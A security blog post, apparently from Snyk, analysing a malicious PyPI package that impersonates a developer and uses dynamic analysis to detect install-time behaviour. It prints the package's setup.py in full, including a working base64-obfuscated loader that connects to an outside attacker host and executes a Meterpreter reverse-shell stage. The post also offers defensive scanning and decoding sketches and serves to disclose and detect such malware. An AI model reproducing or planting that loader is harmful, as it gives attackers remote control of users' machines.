
Phony PyPI package imitates known developer

Written by:

Kyle Suero

October 5, 2022


Snyk security researchers have been using dynamic analysis techniques to unravel the behavior of obfuscated malicious packages. One recent finding in the Python Package Index (PyPI) was a package that attempted to imitate a known open source developer through identity spoofing. Upon further analysis, the team found that the package, raw-tool, hid its malicious behavior behind base64 encoding, reached out to a malicious server, and executed obfuscated code. In this post, we’re going to take a deeper look at that package, but first let’s take a look at how our researchers discovered it.

Combining dynamic and static analysis at Snyk

There are several ways to categorize the analyses our Snyk Security Research team performs on code. The main distinction is between static analysis and dynamic analysis. Static analysis, in the simplest terms, is the examination of files without running them. Our static analysis tools support Snyk’s research into malicious packages hiding in open source ecosystems by flagging suspicious code. By analyzing the code in files, Snyk detects potentially malicious patterns, reaches out to the package indexes of the various ecosystems, and reduces the impact of malicious activity.
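To make the idea of flagging suspicious code concrete, here is a minimal sketch of a static check built on Python's standard ast module. It is not Snyk's detection logic: the watch lists and the function name flag_suspicious_calls are assumptions made up for this illustration, and a real scanner would use far richer rules. The source is parsed but never executed.

```python
import ast

# Hypothetical watch lists for this sketch only.
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}
SUSPICIOUS_ATTRS = {"b64decode", "decompress", "system", "Popen"}


def flag_suspicious_calls(source: str) -> list[tuple[int, str]]:
    """Return (line number, name) pairs for calls worth a closer look.

    The source is only parsed into a syntax tree, never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in SUSPICIOUS_CALLS:
            findings.append((node.lineno, func.id))
        elif isinstance(func, ast.Attribute) and func.attr in SUSPICIOUS_ATTRS:
            findings.append((node.lineno, func.attr))
    return sorted(findings)


# A harmless sample that uses the same exec-plus-base64 shape.
sample = "import base64\nexec(base64.b64decode('cHJpbnQoMSk='))\n"
print(flag_suspicious_calls(sample))
```

A check like this is cheap to run across many packages, but it only sees names that appear literally in the source, which is one reason obfuscation can slip past it.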

Commonly, static analysis is used by developers and coding enterprises to detect vulnerabilities in their proprietary code (security-specific analysis is often referred to as static application security testing, or SAST). As static analysis has become widely adopted by the industry, more detection mechanisms have been developed. In response to these advances, malicious actors have had to adapt, adopting new obfuscation techniques to circumvent common static analysis techniques.

Although static analysis gives us a good idea of what may be lurking in files, it can be difficult to interpret what a program may do at runtime without actually executing some of the code it contains. For this reason, people employ dynamic analysis techniques. Dynamic analysis, sometimes called runtime or execution-time analysis, looks at what code does when it actually runs!

This can be extremely telling if some code is, for example, pulling down other resources from the internet, utilizing encrypted or obfuscated code, or maybe even behaving differently while being analyzed. Some of these malware techniques are more difficult to trace fully without running the actual code. That is where dynamic analysis comes in.

Snyk researchers have recently expanded their use of dynamic analysis to study malware in open source ecosystems. Combining dynamic and static analysis allows researchers at Snyk to detect more kinds of suspicious behavior, analyze malware actors' techniques in more depth, and better understand the current state of malware in open source package indexes.

Boosting detection with dynamic analysis

In our previous PyPI malware posts, we mostly focused on detection techniques that leverage static analysis to flag potentially malicious packages. In recent weeks, Snyk has been investing time and resources to expand these capabilities with dynamic analysis techniques. While static analysis (analysis without execution) has proven successful in detecting a large number of malicious packages so far, it can sometimes be difficult to get a solid grasp of what is happening from a purely static perspective.

To improve our detection rate, Snyk has complemented our detection with dynamic capabilities, monitoring exactly what happens during install and import time. Using traditional software analysis techniques such as network packet capture and monitoring syscalls, we can build a picture of what might have happened by analyzing data such as DNS queries, sockets, file access, and commands executed.
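As a rough illustration of watching behavior at import time, the sketch below uses CPython's audit hooks (sys.addaudithook, available since Python 3.8). This is a swapped-in, in-process technique chosen for brevity, not the packet capture and syscall monitoring described above, and code running in the same process could evade it. The names WATCHED_PREFIXES, observed, and record_event are assumptions for this example.

```python
import sys

# Audit event names of interest, taken from CPython's audit events table.
WATCHED_PREFIXES = ("socket.", "subprocess.", "os.system", "compile", "exec")

observed = []


def record_event(event: str, args: tuple) -> None:
    """Audit hook: remember watched events for later inspection."""
    if event.startswith(WATCHED_PREFIXES):
        observed.append(event)


# Note: audit hooks cannot be removed once installed.
sys.addaudithook(record_event)

# Stand-in for "import the package under test": compile and exec harmless code.
code = compile("x = 1 + 1", "<demo>", "exec")
exec(code)

print(sorted(set(observed)))
```

In a real analysis the package would be installed and imported inside an isolated, disposable environment, with monitoring done from outside the process so the package cannot tamper with it.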

While this doesn’t currently cover malicious functions within the packages themselves, our research has shown that most malicious packages perform their malicious actions earlier rather than later. It makes sense to focus on install and import times for now, but malicious functions are something already on our roadmap to address in the future.

Exploring the PyPI raw-tool malware

This takes us to our earlier example, where we discovered malware in a PyPI package during the early stages of this approach. While monitoring the analysis results, we discovered that the package raw-tool, during its installation, executes unknown binary files and reaches out to a suspicious domain! Let's dive right into the code and see what's happening here.

import setuptools

exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ3NpZGh1Zy0zNTAxOS5wb3J0bWFwLmlvJywzNTAxOSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))

setuptools.setup(name='raw_tool',
      version='2.0.1',
      description='Python Distribution Utilities',
      author='Greg Ward',
      author_email='gward@python.net',
      url='https://www.python.org/',

     )

It becomes immediately obvious something isn’t right here when we look at the argument supplied to the exec function. It starts with a simplistic attempt at obfuscation by taking a payload and encoding it with base64. While this does initially hide the real payload, this raises suspicion and is trivial to decode. The payload above decodes to the following:

[Figure: the decoded first-stage payload, shown as an image in the original post]
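Peeling off a base64 layer like this does not require running anything. The sketch below shows one way an analyst might do it, printing the decoded text instead of passing it to exec. The helper name decode_layer is an assumption for this example, and the sample string is a harmless stand-in rather than the payload from the package.

```python
import base64


def decode_layer(encoded: str) -> str:
    """Decode one base64 layer and return it as text, without executing it."""
    raw = base64.b64decode(encoded, validate=True)
    return raw.decode("utf-8", errors="replace")


# Harmless stand-in for an encoded string found in a setup.py.
sample = base64.b64encode(b"print('hello from stage one')").decode("ascii")
print(decode_layer(sample))
```

The key design choice is that the decoded bytes are only ever treated as data to read, never as code to run.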

What we see above is fairly simple. The Python code creates a socket, connects to an attacker-controlled server, and downloads a second-stage payload, which is then passed through another base64 decoder before being decompressed and passed into exec. In this case, the primary malware was a Python-based Meterpreter. This is essentially an improved reverse shell provided by the Metasploit Framework, which allows the attacker to execute arbitrary commands and easily perform additional functions provided by Meterpreter itself via post-exploitation modules.
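If a second stage like this were captured from the network, it could be unwrapped for inspection without executing it. The following is a minimal sketch under a stated assumption: that the stage is framed as a 4-byte big-endian length followed by base64 text wrapping zlib-compressed Python source. The function name unpack_stage is hypothetical, and the capture is a harmless one built locally.

```python
import base64
import struct
import zlib


def unpack_stage(captured: bytes) -> str:
    """Recover the source of a captured stage without running it.

    Assumed framing (for this sketch): a 4-byte big-endian length, followed by
    that many bytes of base64 text wrapping zlib-compressed Python source.
    """
    (length,) = struct.unpack(">I", captured[:4])
    body = captured[4:4 + length]
    if len(body) != length:
        raise ValueError("capture is truncated")
    return zlib.decompress(base64.b64decode(body)).decode("utf-8", errors="replace")


# Build a harmless capture with the same framing to exercise the function.
encoded = base64.b64encode(zlib.compress(b"print('second stage')"))
capture = struct.pack(">I", len(encoded)) + encoded
print(unpack_stage(capture))
```

The steps mirror the loader in reverse: read the length, take exactly that many bytes, base64-decode, decompress, and stop before exec.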

Thankfully, this malicious package was found and removed from the PyPI infrastructure quickly, ensuring it didn’t continue to create a security risk.

Never stop improving

While this wasn’t the most sophisticated or highly targeted malware, it is a good example of malware providing full remote access to compromised machines via key components of the open source ecosystem. It also demonstrates that our dynamic analysis pipeline can quickly detect malware hidden in newly uploaded packages.

Soon, we aim to combine the signals from both our static and dynamic analysis pipelines for improved accuracy in open source research. Knowing that a package makes calls to suspicious functions, contains encoded strings, and reaches out to a suspicious domain at install time provides a much stronger signal than looking at these results in isolation. And as a Snyk user, you’ll be the one to reap the benefits of these new analysis techniques!
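One simple way to picture combining signals is to count how many independent indicators fire for a package. The sketch below is purely illustrative: the PackageSignals fields, the triage function, and the thresholds are assumptions for this example, not a description of Snyk's pipeline.

```python
from dataclasses import dataclass


@dataclass
class PackageSignals:
    """Hypothetical per-package findings from the two pipelines."""
    suspicious_calls: bool      # static: exec/eval and similar
    encoded_strings: bool       # static: long base64-looking literals
    install_time_network: bool  # dynamic: connection during install or import


def triage(signals: PackageSignals) -> str:
    """Map the number of independent signals to a review priority."""
    hits = sum([signals.suspicious_calls,
                signals.encoded_strings,
                signals.install_time_network])
    if hits == 3:
        return "high"
    if hits == 2:
        return "medium"
    return "low" if hits == 1 else "none"


# All three indicators fire, as they would for a package like raw-tool.
print(triage(PackageSignals(True, True, True)))
```

Each indicator alone is common in legitimate packages; it is the agreement between static and dynamic findings that raises the priority.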
